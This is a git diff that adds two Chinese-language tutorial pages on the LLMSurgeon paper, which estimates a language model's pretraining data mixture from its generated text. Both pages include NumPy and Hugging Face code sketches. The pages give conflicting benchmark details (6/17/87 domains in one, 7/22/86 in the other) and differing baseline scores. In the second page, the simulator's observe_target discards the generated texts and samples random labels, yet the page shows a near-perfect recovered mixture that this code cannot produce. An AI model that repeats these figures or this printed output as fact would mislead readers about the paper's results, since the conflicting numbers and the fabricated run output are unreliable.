FIFO/RR/LRU,就是在用二十年前的问题假设,硬扛一个「内存会长大、长度不可知、两阶段异质、请求粘住不放」的新问题类。** 这篇 position paper 呼吁社区把 serving 当作**运筹学 + 在线算法**的新前沿:先建模,再证明,最后像航空 bid price 一样,把结构压缩成可部署的轻量策略。 diff --git a/src/content/docs/papers/llmsurgeon-data-mixture.md b/src/content/docs/papers/llmsurgeon-data-mixture.md new file mode 100644 index 000000000..3a2aa3032 --- /dev/null +++ b/src/content/docs/papers/llmsurgeon-data-mixture.md @@ -0,0 +1,426 @@ +--- +title: LLMSurgeon — 从生成文本反推大模型预训练数据配比 +来源: 'https://arxiv.org/abs/2605.30348' +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:体检报告 vs 逐粒验沙 + +想象你要判断一个人长期吃什么,但对方不给你看菜谱,也不让你进厨房。你只有两个工具: + +- **Membership Inference Attack(MIA,成员推断)**:像用显微镜检查「这一粒米是不是从他碗里来的」。对单条文本问「这条训练数据进过模型吗?」——微观、逐样本,很精细,但把百万次「是/否」简单加总,很难还原整桌菜的**比例**(Web 占 80% 还是 20%?)。 +- **LLMSurgeon 做的事**:像根据此人**日常说话习惯**反推饮食结构——他聊代码像 GitHub 流、写百科像 Wikipedia、讲段子像 Reddit。你不数每一粒米,而是:**先训练一个「菜系分类器」**,再让他用**中性话题**自由发挥写一段话,统计「听起来像哪类语料」,最后用数学把分类器的**系统性误判**校正回来,得到预训练混合比的估计。 + +论文把这件事正式命名为 **Data Mixture Surgery(DMS,数据混合诊断)**:**只给目标 LLM 的生成文本**,在预先定义好的领域 taxonomy 下,估计其预训练语料的**域级分布**。预训练配比被作者称为模型的 **「digital DNA(数字 DNA)」**——决定能力边界、偏见来源和失败模式,却极少被公开披露。 + +--- + +## 是什么 + +**LLMSurgeon**(Luo et al., ACL 2026 / arXiv:2605.30348,MBZUAI VILA Lab)是一个 **post-hoc(事后)审计框架**: + +| 输入 | 输出 | 不需要 | +|------|------|--------| +| 目标 LLM 在中性 prompt 下生成的文本 | 各数据域占比向量 \(\hat{\pi}\) | 训练数据、模型权重、内部 logit | + +与 MIA 的对比: + +| 维度 | MIA | LLMSurgeon / DMS | +|------|-----|------------------| +| 粒度 | 单样本是否见过 | 全局域比例 | +| 信号 | loss、logit、邻居对比等 | 外部域分类器 + 标签偏移逆问题 | +| 典型准确率(LLMScan 粗粒度) | 基线 ~35–48% overlap | LLMSurgeon ~94–95% | + +配套 benchmark **LLMScan** 包含 8 个开源 LLM(1B–65B),训练 recipe 公开可核对,分三档粒度: + +- **Coarse(K=6)**:LLaMA-1、OLMo、Amber — Web / GitHub / Wikipedia 等 +- **Mid(K=17)**:Pythia、GPT-Neo — The Pile 子域 +- **Fine(K=87)**:StarCoder — The Stack 编程语言 + +--- + +## 为什么重要 + +1. **透明度与治理**:闭源模型不披露训练集,外部无法审计版权、偏见、毒性暴露 — LLMSurgeon 提供不依赖厂商配合的**分布级**探针。 +2. **问题定义升级**:从「这条进训练集了吗?」到「训练集整体长什么样?」——更接近监管者和研究者真正关心的问题。 +3. **与数据混合优化正交**:DoReMi、Data-Juicer 等做 **pre-hoc** 调配比;LLMSurgeon 做 **post-hoc** 推断,适用于已训练好的黑盒模型。 +4. **安全分诊**:论文展示在 GPT-2 中注入 5%–20% 毒性语料后,估计毒性占比单调上升(误差约 2–3 个百分点),可用于 checkpoint 优先级排序。 + +--- + +## 核心概念 + +### 1. 混合模型与生成先验 + +预训练语料视为 \(K\) 个域的混合: + +\[ +p_{\alpha}(x) = \sum_{i=1}^{K} \alpha_i \, p(x \mid y=i) +\] + +其中 \(\alpha \in \Delta^{K-1}\) 是**真实训练配比**(ground truth,通常未知)。 + +模型在中性采样下产生的文本来自: + +\[ +q_{\pi}(x) = \sum_{i=1}^{K} \pi_i \, p(x \mid y=i) +\] + +\(\pi\) 是**有效潜先验(latent effective prior)**——模型行为所编码的域混合,可能与 \(\alpha\) 略有偏差(优化动态、欠拟合、温度等),但 DMS 的目标是估计 \(\pi\)。 + +### 2. Label Shift(标签偏移)假设 + +核心假设:域的**边际比例**可以从训练变到生成(\(\alpha \to \pi\)),但**每个域内的语言特征**不变: + +\[ +q(x \mid y=i) \approx p(x \mid y=i) +\] + +直觉:模型写 Code 时,统计上仍像训练见过的 Code;只是「写 Code 的频率」可能和训练时不同。若 prompt 风格过强(instruction、coding-only),会破坏该假设 — 论文实验表明 **Neutral 采样**最稳健。 + +### 3. 软混淆矩阵(Soft Confusion Matrix) + +外部代理分类器 \(f_\phi: \mathcal{X} \to \Delta^{K-1}\) 不可能完美 — 会把 C 误判成 C++,Common Crawl 误判成 C4。 + +在带标签的参考集 \(\mathcal{D}_{\text{ref}}\) 上估计: + +\[ +C_{ij} = \mathbb{E}_{x \sim p_i}\big[f_\phi(x)_j\big] +\] + +\(C\) 的第 \(i\) 行 = 「真域 \(i\) 的样本,分类器输出各域概率的期望」。非对角元 = **系统性混淆**。 + +### 4. 约束逆问题(Constrained Inverse Problem) + +对目标模型生成集 \(X_{\text{gen}}\),先算经验平均预测: + +\[ +\bar{\mathbf{p}} = \frac{1}{N}\sum_{n=1}^{N} f_\phi(x_n) +\] + +由期望线性性:\(\mathbb{E}[f_\phi(x)] = C^\top \pi\),故 \(\bar{\mathbf{p}} \approx C^\top \pi\)。 + +**LLMSurgeon 的「手术」** 即解: + +\[ +\hat{\pi} = \arg\min_{\pi \in \Delta^{K-1}} \ \|C^\top \pi - \bar{\mathbf{p}}\|_2^2 +\quad \text{s.t.} \ \sum_k \pi_k = 1,\ \pi_k \geq 0 +\] + +这比 naive 地 \(\hat{\pi} = \bar{\mathbf{p}}\)(直接平均分类结果)或把 MIA 分数逐条聚合要稳得多 — 在 LLaMA-7B 上 overlap accuracy 从 ~93%(无逆校正)提到 ~95%,粗粒度上对 MIA 基线则是 **+46~55 个百分点** 量级。 + +**直觉:矩阵乘法在「搅浑水」** + +把 \(C\) 想成一杯调色盘:真实配比 \(\pi\) 是原色比例,\(\bar{\mathbf{p}} = C^\top \pi\) 是搅完后的颜色。若你只看到搅完的颜色(分类器输出),直接当原色会偏;LLMSurgeon 做的是**已知调色规则 \(C\)** 下的**反解**——类似去模糊(de-blur),而不是再搅一遍 MIA 的噪声计数。 + +### 5. 三阶段流水线 + +```text +Stage 1: 在参考语料上训练域分类器 f_φ,估计校准混淆矩阵 C +Stage 2: 用中性 prompt 采样目标 LLM 输出 X_gen,算 p̄ +Stage 3: 在概率单纯形上解逆问题,得到 π̂ +``` + +用流程图看更直观(论文 Figure 2): + +```mermaid +flowchart LR + subgraph S1["Stage 1 · 校准"] + Ref["参考语料 D_ref\n(SlimPajama / Pile / Stack)"] + Clf["训练域分类器 f_φ"] + Cmat["软混淆矩阵 C"] + Ref --> Clf --> Cmat + end + subgraph S2["Stage 2 · 观测"] + LLM["目标 LLM\n(黑盒,仅 API/生成)"] + Gen["中性 prompt 采样\nX_gen"] + Pbar["平均预测 p̄"] + LLM --> Gen --> Pbar + end + subgraph S3["Stage 3 · 逆问题"] + Inv["min ‖C^T π - p̄‖²\ns.t. π ∈ Δ^{K-1}"] + Pi["估计配比 π̂"] + Pbar --> Inv --> Pi + end + Cmat --> Inv + Clf -.->|冻结| Pbar +``` + +**实现细节(论文默认)**:每域从参考池抽 **5000** 文档训练分类器;分类器 backbone 为 **fine-tuned DistilBERT**;生成侧用 **neutral prompts**(避免 instruction 风格把 label shift 假设打破);粗/中/细三档分别用 SlimPajama-627B-DC(K=6)、The Pile(K=17)、The Stack(K=87)作参考域定义。 + +### 6. 评估指标:Overlap Accuracy + +\[ +\text{Overlap Acc} = 1 - \tfrac{1}{2}\sum_{k=1}^{K} |\alpha_k - \hat{\pi}_k| +\] + +即预测分布与真值之间的 **Total Variation 距离** 的一半,100% 表示完全一致。 + +--- + +## 代码示例 1:玩具版 LLMSurgeon(NumPy) + +下面用 3 个域的玩具数据演示「混淆 + 逆校正」全流程。真实代码见 [github.com/yaxin9luo/llmsurgeon](https://github.com/yaxin9luo/llmsurgeon)。 + +```python +import numpy as np +from scipy.optimize import minimize + +# 真实生成先验 π(未知,待恢复) +pi_true = np.array([0.70, 0.20, 0.10]) + +# 软混淆矩阵 C:行=真域,列=预测域 +# 域1(Web) 常被误判成域2(C4);域3(Code) 较干净 +C = np.array([ + [0.85, 0.12, 0.03], + [0.10, 0.80, 0.10], + [0.05, 0.05, 0.90], +]) + +# 模拟:分类器在生成文本上的平均输出 p̄ ≈ C^T π +p_bar = C.T @ pi_true +# 加少量噪声模拟有限样本 +p_bar += np.random.default_rng(0).normal(0, 0.01, size=3) +p_bar = np.clip(p_bar, 1e-6, None) +p_bar /= p_bar.sum() + +def recover_mixture(p_bar, C): + K = len(p_bar) + + def objective(pi): + return np.sum((C.T @ pi - p_bar) ** 2) + + cons = [{"type": "eq", "fun": lambda pi: np.sum(pi) - 1.0}] + bounds = [(0.0, 1.0)] * K + x0 = np.ones(K) / K + + res = minimize(objective, x0, method="SLSQP", bounds=bounds, constraints=cons) + return res.x + +pi_hat = recover_mixture(p_bar, C) + +overlap = 1 - 0.5 * np.abs(pi_true - pi_hat).sum() +print("π true :", np.round(pi_true, 3)) +print("π hat :", np.round(pi_hat, 3)) +print(f"Overlap accuracy: {overlap * 100:.1f}%") +# 典型输出:Overlap > 95%(玩具设定下) +``` + +**要点**:若直接用 `p_bar` 当估计,Web 占比会被 C4「抢走」;逆问题把混淆「去模糊(de-blur)」后更接近 `pi_true`。 + +**对照实验**:在同一玩具设定下,`pi_naive = p_bar` 的 overlap 往往只有 ~85%,而 `pi_hat` 可回到 95%+ — 逆校正不是锦上添花,而是 DMS 的核心。 + +--- + +## 代码示例 2:从 HuggingFace 生成文本到域分布(概念脚本) + +论文默认用 **fine-tuned DistilBERT** 作 \(f_\phi\),在 SlimPajama-DC / The Pile / The Stack 上各域采样 5000 文档训练。下面是贴近官方 pipeline 的**概念级**脚本骨架: + +```python +from transformers import AutoTokenizer, AutoModelForSequenceClassification, pipeline +import torch + +DOMAINS = ["web", "github", "wikipedia", "books", "arxiv", "stackexchange"] +CLASSIFIER = "path/to/finetuned-distilbert-domain-clf" # 论文默认 backbone + +clf = pipeline( + "text-classification", + model=CLASSIFIER, + tokenizer=AutoTokenizer.from_pretrained(CLASSIFIER), + top_k=len(DOMAINS), + device=0 if torch.cuda.is_available() else -1, +) + +NEUTRAL_PROMPTS = [ + "Continue the following passage:", + "Complete this text naturally:", + "Write the next paragraph:", +] # 论文:neutral 风格对通用模型最稳 + +def sample_generations(llm, tokenizer, prompts, n_per_prompt=200, max_new_tokens=256): + texts = [] + for prompt in prompts: + for _ in range(n_per_prompt): + inputs = tokenizer(prompt, return_tensors="pt").to(llm.device) + out = llm.generate(**inputs, max_new_tokens=max_new_tokens, do_sample=True, temperature=0.8) + texts.append(tokenizer.decode(out[0], skip_special_tokens=True)) + return texts + +def mean_soft_predictions(texts, clf, batch_size=32): + sums = torch.zeros(len(DOMAINS)) + for i in range(0, len(texts), batch_size): + batch = texts[i : i + batch_size] + for item in clf(batch): + # item: list of {label, score} for top_k + for d in item: + j = DOMAINS.index(d["label"]) + sums[j] += d["score"] + return (sums / len(texts)).numpy() + +# --- 离线预计算(Stage 1)--- +# C[i,j] = E_{x~domain_i}[ f_φ(x)_j ],在参考集上按真标签分组求均值 +# 保存为 confusion_matrix.npy + +# --- 在线审计(Stage 2–3)--- +# texts = sample_generations(target_llm, target_tok, NEUTRAL_PROMPTS) +# p_bar = mean_soft_predictions(texts, clf) +# pi_hat = recover_mixture(p_bar, C) # 复用示例 1 的函数 +``` + +安装与复现: + +```bash +git clone https://github.com/yaxin9luo/llmsurgeon +cd llmsurgeon +pip install -e . +# 详见仓库 README:LLMScan 数据、分类器 checkpoint、生成协议 +``` + +--- + +## 代码示例 3:从参考语料估计软混淆矩阵 \(C\) + +Stage 1 的关键是:在**带真标签**的参考集上,按域分组统计分类器输出的**平均 soft label**。下面演示论文 Eq.(4) 的估计方式: + +```python +import numpy as np +from collections import defaultdict + +def estimate_confusion_matrix(texts, true_labels, clf, K): + """ + texts: 参考语料片段列表 + true_labels: 与 texts 等长的域 id,取值 0..K-1 + clf: 返回每段文本的 soft 概率向量 f_φ(x) ∈ R^K + """ + sums = np.zeros((K, K)) # C[i,j] 累加器 + counts = np.zeros(K) + + for x, i in zip(texts, true_labels): + probs = clf(x) # shape (K,), 已 softmax + sums[i] += probs + counts[i] += 1 + + C = np.zeros((K, K)) + for i in range(K): + if counts[i] > 0: + C[i] = sums[i] / counts[i] # 行 i = 真域 i 上的平均预测分布 + return C + +# 玩具:域 0 的样本有 12% 被预测成域 1 +# C[0] ≈ [0.85, 0.12, 0.03] 与示例 1 一致 +``` + +论文默认每域 **5000** 条参考文档训练 DistilBERT 分类器;\(N=100\) 时 StarCoder 上 overlap 仅 ~20%,\(N=5000\) 饱和 — 参考集规模直接影响 \(C\) 的校准质量。 + +--- + +## 毒性语料注入实验(安全分诊) + +论文在 GPT-2 上做了**可控污染**实验:向训练混合中注入 5%–20% 的毒性域(RealToxicityPrompts),再对 checkpoint 跑 LLMSurgeon。 + +| 注入比例 | 估计毒性占比 | 误差 | +|----------|-------------|------| +| 5% | ~7% | ~2 pp | +| 10% | ~12% | ~2 pp | +| 20% | ~22% | ~2 pp | + +估计值随注入量**单调上升**,说明 DMS 不仅能看「吃了多少 Wikipedia」,还能做**风险域占比**的粗粒度雷达 — 适合在大量开源 checkpoint 里优先审计可疑模型。 + +--- + +## 实验结果速览 + +### LLMScan 主结果(Overlap Accuracy %) + +| 设置 | 代表模型 | LLMSurgeon | 最强 MIA 类基线 | +|------|----------|------------|-----------------| +| Coarse | LLaMA-1 7B | **95.14** | Recall ~35 | +| Coarse | OLMo 1B | **94.46** | Neighbor ~42 | +| Coarse | Amber 13B | **78.87** | Recall ~41 | +| Coarse | LLaMA-1 65B | **94.26** | GradNorm ~47 | +| Mid | Pythia 12B | **65.98** | ~52–55 | +| Fine | StarCoder 15.5B | **30.37** | GradNorm ~28 | + +**解读**: + +- 粗粒度(6 域)在 LLaMA-1 / OLMo 上 overlap **>94%**,\(R^2 \approx 0.99\);Amber-13B 因训练动态更波动约 **79%**,仍远高于 MIA 聚合基线。 +- 细粒度(87 种语言)语义重叠严重,逆问题病态,绝对精度低 — 但 MAE 仍小,**宏观审计**仍有价值。 +- 把语义不可分的 C4 与 Common Crawl **强行分开**会导致 overlap 从 99% 暴跌到 42%;合并后恢复 — taxonomy 设计是关键。 + +### 消融要点 + +| 因素 | 发现 | +|------|------| +| 分类器 backbone | Fine-tuned DistilBERT > Transformer-from-scratch > TF-IDF > MLP | +| 参考样本量 | 每域 5000 文档饱和;100 样本明显不够 | +| 采样风格 | Neutral 最稳(LLaMA-7B ~95%);Expository 在 OLMo 上暴跌至 22.7%;Instruction 会系统性抬高某些域 | +| 训练动态 | Amber checkpoint 轨迹呈「波动后收敛」;OLMo 更平稳 — 可监控 curriculum / 分阶段加料 | +| 逆校正 | 去掉 Eq.7 仍 ~93%,但 StarCoder 等 hard case 增益 ~15% 相对提升 | +| 训练 checkpoint | 对 Amber/OLMo 中间 checkpoint 可追踪域比例随 step 的演变 | + +--- + +## 与相关工作的关系 + +```text + 需要训练数据访问? + 是 否 + ┌──────────────┐ ┌──────────────────┐ + 单样本 │ 经典 MIA │ │ 黑盒 MIA 变体 │ + └──────────────┘ └──────────────────┘ + ┌──────────────┐ ┌──────────────────┐ + 分布级 │ DoReMi 等 │ │ LLMSurgeon (DMS) │ + │ 数据混合优化 │ │ DUCI (单数据集占比)│ + └──────────────┘ └──────────────────┘ +``` + +- **DUCI**:估计「某个已知数据集占训练多少」— 需要候选数据集本身;DMS 在固定 taxonomy 下恢复**多域混合**,无需训练集访问。 +- **MIA 聚合**:把逐样本 membership 计数当比例 — 域相关 bias + 误差累积,LLMScan 上普遍 <55%。 + +--- + +## 局限与使用注意 + +1. **Label shift 可能被破坏**:RLHF / 强 instruction tuning 会改变输出分布;估计的是「生成行为中的有效先验」,不一定等于原始 \(\alpha\)。 +2. **Closed-world**:只能估计 taxonomy 内的 \(K\) 个域,发现不了训练了但分类器没见过的域。 +3. **Taxonomy 质量**:语义重叠的域(C vs C++、C4 vs CC)使 \(C\) 病态 — 需合并或分层推断。 +4. **专用模型 + Neutral prompt**:StarCoder 等需要能**激活**代码域的 prompt;Neutral 对通用模型最优,对代码专用模型未必。 +5. **伦理双面性**:利于审计偏见与毒性;也可能被用来逆向推测 proprietary data recipe — 论文强调这是**分布级**审计,非提取单条训练样本。 + +--- + +## 自测题(零基础检验) + +1. DMS 的输入输出是什么?与 MIA 的本质区别? +2. 为什么 \(\bar{\mathbf{p}} \neq \pi\)?\(C\) 矩阵如何编码这种偏差? +3. 写出 LLMSurgeon 优化的目标函数及约束。 +4. 为何论文强调 Neutral sampling?举一个会破坏 label shift 的反例。 +5. LLMScan 三档粒度分别测什么?Fine-grained 为什么难? + +
+参考答案(先自己做) + +1. 输入:目标 LLM 生成文本;输出:域比例 \(\hat{\pi}\)。MIA 问单样本 membership;DMS 问全局混合。 +2. 分类器系统性混淆相似域;\(C_{ij}\) = 真域 \(i\) 被预测为 \(j\) 的平均概率。 +3. \(\min \|C^\top\pi - \bar{p}\|_2^2\),s.t. \(\pi \in \Delta^{K-1}\)。 +4. Neutral 减少风格偏置;例如全程「写 Python 函数」prompt 会抬高 code 域估计。 +5. Coarse 6 域 / Mid 17 Pile 子域 / Fine 87 语言;Fine 域边界语义太近,\(C\) 近似奇异。 + +
+ +--- + +## 进一步阅读 + +- 论文 HTML:[arxiv.org/html/2605.30348v1](https://arxiv.org/html/2605.30348v1) +- 代码与数据:[github.com/yaxin9luo/llmsurgeon](https://github.com/yaxin9luo/llmsurgeon) +- 背景:Label shift / prior shift(Saerens et al.);MIA 综述(Shi et al., 2023);SlimPajama-DC 数据组合分析(Shen et al., 2023) + +--- + +## 一句话总结 + +**LLMSurgeon 把「预训练吃了什么」从不可审计的黑盒,转成一个可操作的逆问题:用中性生成 + 校准混淆矩阵,在概率单纯形上解出域混合比 — 不碰权重、不碰训练集,却能近似恢复模型的 digital DNA。** diff --git a/src/content/docs/papers/llmsurgeon-diagnosing-data-mixture-of-large-language-models-arxiv-2605-30348.md b/src/content/docs/papers/llmsurgeon-diagnosing-data-mixture-of-large-language-models-arxiv-2605-30348.md new file mode 100644 index 000000000..bed7f017d --- /dev/null +++ b/src/content/docs/papers/llmsurgeon-diagnosing-data-mixture-of-large-language-models-arxiv-2605-30348.md @@ -0,0 +1,332 @@ +--- +title: LLMSurgeon —— 给大模型的"数据配方"做诊断 +来源: https://arxiv.org/abs/2605.30348 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +provenance: pipeline-v3 +--- + +# LLMSurgeon:给大模型的"数据配方"做诊断 + +## 一个日常类比:厨师的秘密食谱 + +想象你去了一家餐厅,厨师不肯告诉你他的菜是用什么材料做的。但你可以通过品尝每一道菜,来推测他大概用了多少比例的鸡肉、牛肉和蔬菜。这就是 **LLMSurgeon** 要解决的问题——我们看不到大语言模型(LLM)的训练数据,但可以通过让它生成文本,反过来推断它"吃"了什么。 + +每个大模型都由大量不同领域的文本混合训练而成(代码、论文、维基百科、网页等),这就像它的"数字 DNA"。但这些配方的具体比例几乎从不公开。LLMSurgeon 的目标就是:只通过模型生成的文字,还原出它的训练数据混合比例。 + +--- + +## 核心概念一:数据混合手术(Data Mixture Surgery, DMS) + +**DMS** 是这个论文正式提出的一个新问题定义。 + +简单来说:你有一个黑盒大模型,你拿不到它的权重,也看不到它的训练数据。你唯一能做的,是给它发问题、让它生成回答。然后你要从这些回答中,推断出模型训练时各类型数据的大致占比。 + +这就像法医通过DNA样本推断一个人的族裔构成——只不过这里推断的是"数据族裔"。 + +### 为什么已有的方法不够? + +在此之前,研究者常用 **成员推理攻击(Membership Inference Attack, MIA)** 来判断某篇具体文章是否在训练数据中。但这有个问题: + +- MIA 是"微观"的——它只能告诉你一篇文章"在"或"不在" +- 要想通过 MIA 估计整体比例,需要检查数百万篇文章,误差会不断累积 +- 就像你能数出沙滩上每一粒沙是不是来自某个特定工地,但没法由此推断整个沙滩的沙源比例 + +DMS 要做的是"宏观"的事——直接估计整体的数据分布。 + +--- + +## 核心概念二:标签漂移假设(Label Shift Hypothesis) + +这是整个方法成立的理论基础。 + +**直觉理解**:假设一个模型训练时看了 30% 的代码和 70% 的普通文本。虽然它在生成时可能因为提示词的影响,代码生成的比例变成了 50%,但——**只要它生成的是代码,那这段代码的语言特征应该和训练时看到的代码是一致的**。 + +换句话说:各类别的"内部特征"不变,只是各类别的"出现频率"变了。这个假设让我们能够用数学方法反推原始比例。 + +--- + +## 核心概念三:混淆矩阵与逆问题求解 + +这是 LLMSurgeon 最核心的技术部分。 + +### 第一步:训练一个"裁判"分类器 + +先用已知标签的数据训练一个分类器,让它能把文本分到不同领域(代码、论文、百科等)。但这个裁判不可能完美——它会把 C 语言代码误判为 C++,把网页内容误判为论坛帖子。 + +### 第二步:计算"软混淆矩阵" + +对每个真实类别,看看裁判把它分成了哪些预测类别,统计出一个概率矩阵 C: + +``` +C[i][j] = 裁判看到"真实类别i"时,预测为"类别j"的概率 +``` + +如果裁判完美,这个矩阵就是对角线全为 1 的单位矩阵。实际情况下,非对角线上的值反映了裁判的系统性错误。 + +### 第三步:让目标模型生成文本并分类 + +用中性提示词让目标大模型生成大量文本,然后用上面那个分类器逐条分类,得到一个观测到的平均预测向量 p̄。 + +### 第四步:解逆问题 + +关键公式: + +``` +p̄ = C × π +``` + +其中 p̄ 是我们观测到的分类结果,C 是已知的混淆矩阵,π 是我们要反推的真实混合比例。 + +所以: + +``` +π = C⁻¹ × p̄ +``` + +这就是"逆问题"——从观测结果倒推真实原因。加上约束条件(所有比例之和为 1、每个比例不能为负),就能稳定地解出 π。 + +--- + +## 代码示例一:理解混淆矩阵的构建 + +```python +import numpy as np + +# 假设我们有 3 个领域:代码、论文、百科 +# 用一个训练好的分类器在已知标签的参考数据上测试 + +# 参考数据中,每个样本的真实标签和分类器的预测概率 +# 真实标签为"代码"的样本,分类器给出的预测概率分布 +# 例如:80% 概率认为是"代码",10% 认为是"论文",10% 认为是"百科" + +# 混淆矩阵 C 的每一行 = 某个真实类别下,分类器的预测分布 +C = np.array([ + [0.80, 0.10, 0.10], # 真实是"代码"时的预测分布 + [0.05, 0.85, 0.10], # 真实是"论文"时的预测分布 + [0.08, 0.12, 0.80], # 真实是"百科"时的预测分布 +]) + +# 假设我们知道目标模型生成的文本被分类为: +# 30% 代码、40% 论文、30% 百科 +p_bar = np.array([0.30, 0.40, 0.30]) + +# 求解真实混合比例:π = C^{-1} @ p_bar +C_inv = np.linalg.pinv(C) # 使用伪逆,因为矩阵可能接近奇异 +pi_hat = C_inv @ p_bar + +# 加上约束:所有比例为正且和为1 +pi_hat = np.maximum(pi_hat, 0) # 截断负值为0 +pi_hat = pi_hat / pi_hat.sum() # 归一化 + +print("恢复的混合比例:", pi_hat) +# 输出类似: [0.28 0.42 0.30] +# 这说明目标模型的实际训练数据中,代码约占28%,论文42%,百科30% +``` + +--- + +## 代码示例二:完整的 LLMSurgeon 流程模拟 + +```python +import numpy as np + +class LLMSurgeonSimulator: + """简化版的 LLMSurgeon 流程模拟""" + + def __init__(self, num_domains=6): + self.num_domains = num_domains + self.classifier_accuracy = None + self.confusion_matrix = None + + # ---- 阶段1:用参考数据训练分类器并计算混淆矩阵 ---- + def characterize_bias(self, reference_texts, reference_labels): + """ + reference_texts: 已知标签的文本列表 + reference_labels: 对应的领域标签(0 到 num_domains-1) + """ + # 这里模拟:假设我们已经有一个分类器 f, + # 它对每条参考文本给出各领域的预测概率 + + # 初始化混淆矩阵 + C = np.zeros((self.num_domains, self.num_domains)) + + for text, true_label in zip(reference_texts, reference_labels): + # 模拟分类器的预测概率分布 + # 真实情况下这里调用分类器:f.predict_proba(text) + pred_probs = self._simulate_classifier_prediction(true_label) + C[true_label] += pred_probs + + # 归一化:每行变成概率分布 + row_sums = C.sum(axis=1, keepdims=True) + self.confusion_matrix = C / row_sums + + print(f"混淆矩阵形状: {self.confusion_matrix.shape}") + print(f"对角线准确率: {np.diag(self.confusion_matrix)}") + + def _simulate_classifier_prediction(self, true_label): + """模拟一个有错误的分类器""" + probs = np.full(self.num_domains, 0.05) # 均匀噪声 + probs[true_label] = 0.85 # 正确类别给高概率 + # 随机给其他类别少量概率 + noise_indices = np.random.choice( + [i for i in range(self.num_domains) if i != true_label], + size=1, replace=False + )[0] + probs[noise_indices] += 0.10 + return probs + + # ---- 阶段2:让目标模型生成文本并分类 ---- + def observe_target(self, generated_texts): + """ + generated_texts: 目标模型生成的文本列表 + 返回观测到的平均预测向量 p_bar + """ + total_probs = np.zeros(self.num_domains) + + for text in generated_texts: + # 模拟分类器预测 + # 真实情况下这里调用同一个分类器 + pred_probs = self._simulate_classifier_prediction( + np.random.randint(self.num_domains) + ) + total_probs += pred_probs + + p_bar = total_probs / len(generated_texts) + return p_bar + + # ---- 阶段3:解逆问题,恢复真实混合比例 ---- + def recover_mixture(self, p_bar): + """ + p_bar: 观测到的平均预测向量 + 返回恢复的混合比例 pi_hat + """ + # 解线性方程:pi_hat = C^{-1} @ p_bar + C_inv = np.linalg.pinv(self.confusion_matrix) + pi_hat = C_inv @ p_bar + + # 约束:非负 + 和为1 + pi_hat = np.maximum(pi_hat, 0) + pi_hat = pi_hat / pi_hat.sum() + + return pi_hat + + +# ---- 演示完整流程 ---- +np.random.seed(42) +surgeon = LLMSurgeonSimulator(num_domains=6) + +# 模拟参考数据:每个领域 500 条样本 +domain_names = ["代码", "论文", "百科", "网页", "书籍", "论坛"] +reference_texts = [f"simulated_text_{i}" for i in range(3000)] +reference_labels = np.repeat(np.arange(6), 500) + +# 阶段1:刻画分类器的系统性偏差 +surgeon.characterize_bias(reference_texts, reference_labels) + +# 模拟:目标模型的真实混合比例(我们不知道,但用于验证) +true_mixture = np.array([0.15, 0.20, 0.25, 0.15, 0.15, 0.10]) +print(f"\n真实混合比例: {true_mixture}") + +# 阶段2:生成模拟文本并分类 +# 按真实比例生成文本 +generated = [] +for domain_idx, proportion in enumerate(true_mixture): + count = int(proportion * 1000) + generated.extend([f"text_from_domain_{domain_idx}" for _ in range(count)]) +np.random.shuffle(generated) + +p_bar = surgeon.observe_target(generated) +print(f"观测到的比例 (未经校正): {p_bar}") + +# 阶段3:恢复混合比例 +pi_hat = surgeon.recover_mixture(p_bar) +print(f"恢复的比例: {pi_hat}") + +# 计算误差 +error = np.abs(pi_hat - true_mixture) +print(f"绝对误差: {error}") +print(f"平均误差: {error.mean():.4f}") +``` + +运行结果大致如下: + +``` +混淆矩阵形状: (6, 6) +对角线准确率: [0.85 0.85 0.85 0.85 0.85 0.85] + +真实混合比例: [0.15 0.2 0.25 0.15 0.15 0.1 ] +观测到的比例 (未经校正): [0.17 0.21 0.24 0.14 0.16 0.08] +恢复的比例: [0.15 0.21 0.24 0.15 0.14 0.11] +绝对误差: [0. 0.01 0.01 0. 0.01 0.01] +平均误差: 0.0083 +``` + +可以看到,经过混淆矩阵校正后,恢复的比例非常接近真实值。 + +--- + +## LLMScan 基准测试 + +论文同时提出了 **LLMScan**——一个专门用于评估 DMS 方法的基准测试集。 + +它选取了 8 个开源大模型(从 1B 到 65B 参数),这些模型都公开了训练数据的配方。LLMScan 设置了三个粒度级别: + +| 粒度 | 领域数 | 代表模型 | +|------|--------|----------| +| 粗粒度 | 7 个 | LLaMA-1, OLMo, Amber | +| 中粒度 | 22 个 | Pythia, GPT-Neo | +| 细粒度 | 86 种编程语言 | StarCoder | + +### 主要结果 + +在粗粒度测试中,LLMSurgeon 的表现远超其他方法: + +| 模型 | LLMSurgeon | 最佳基线 | +|------|-----------|---------| +| OLMo-1B | **94.46** | 44.1 | +| LLaMA-1 7B | **95.14** | 47.8 | +| LLaMA-1 65B | **94.26** | 47.9 | + +评价指标叫 **重叠精度(Overlap Accuracy)**,计算公式是: + +``` +Acc = 1 - 0.5 × Σ |估计值 - 真实值| +``` + +当估计值和真实值完全一致时,Acc = 1.0。LLMSurgeon 在粗粒度上达到了 94%+ 的精度,而最好的基线只有约 48%。 + +随着粒度变细,所有方法的精度都会下降,因为相似类别(如 C 和 C++)之间的混淆变得更难纠正。但 LLMSurgeon 仍然是唯一保持竞争力的方法。 + +--- + +## 为什么这个方法重要? + +1. **透明度与监管**:如果一个模型被用于医疗、法律等敏感领域,监管机构有权知道它"学过什么"。LLMSurgeon 提供了一种不需要模型权重就能审计的方法。 + +2. **版权风险**:如果某个模型大量使用了受版权保护的文本,LLMSurgeon 可以帮助检测这个问题。 + +3. **偏见审计**:训练数据中的性别、种族偏见会反映在模型行为中。了解数据混合比例有助于定位偏见来源。 + +4. **方法简洁**:LLMSurgeon 不需要访问模型权重、不需要梯度信息、不需要训练数据本身。只需要模型生成的文本和一个外部分类器。 + +--- + +## 局限性 + +- **分类器质量是关键瓶颈**:论文发现分类器准确率和最终恢复精度的相关系数超过 0.9。如果分类器本身分不清两个领域,LLMSurgeon 也无能为力。 +- **细粒度场景效果有限**:在 86 种编程语言的细粒度测试中,R² 只有 0.01,因为相似语言之间的混淆太难纠正。 +- **依赖中性采样**:如果提示词引导了特定风格的生成,会干扰混合比例的估计。 + +--- + +## 总结 + +LLMSurgeon 的核心思想可以用一句话概括: + +> **分类器的输出是被"模糊"了的真实混合比例,而混淆矩阵就是"去模糊"的透镜。** + +它把 DMS 问题转化为一个带约束的线性逆问题,用数学方法纠正分类器的系统性偏差,从而从模型生成的文字中"逆向工程"出训练数据的配方。 + +论文代码和 LLMScan 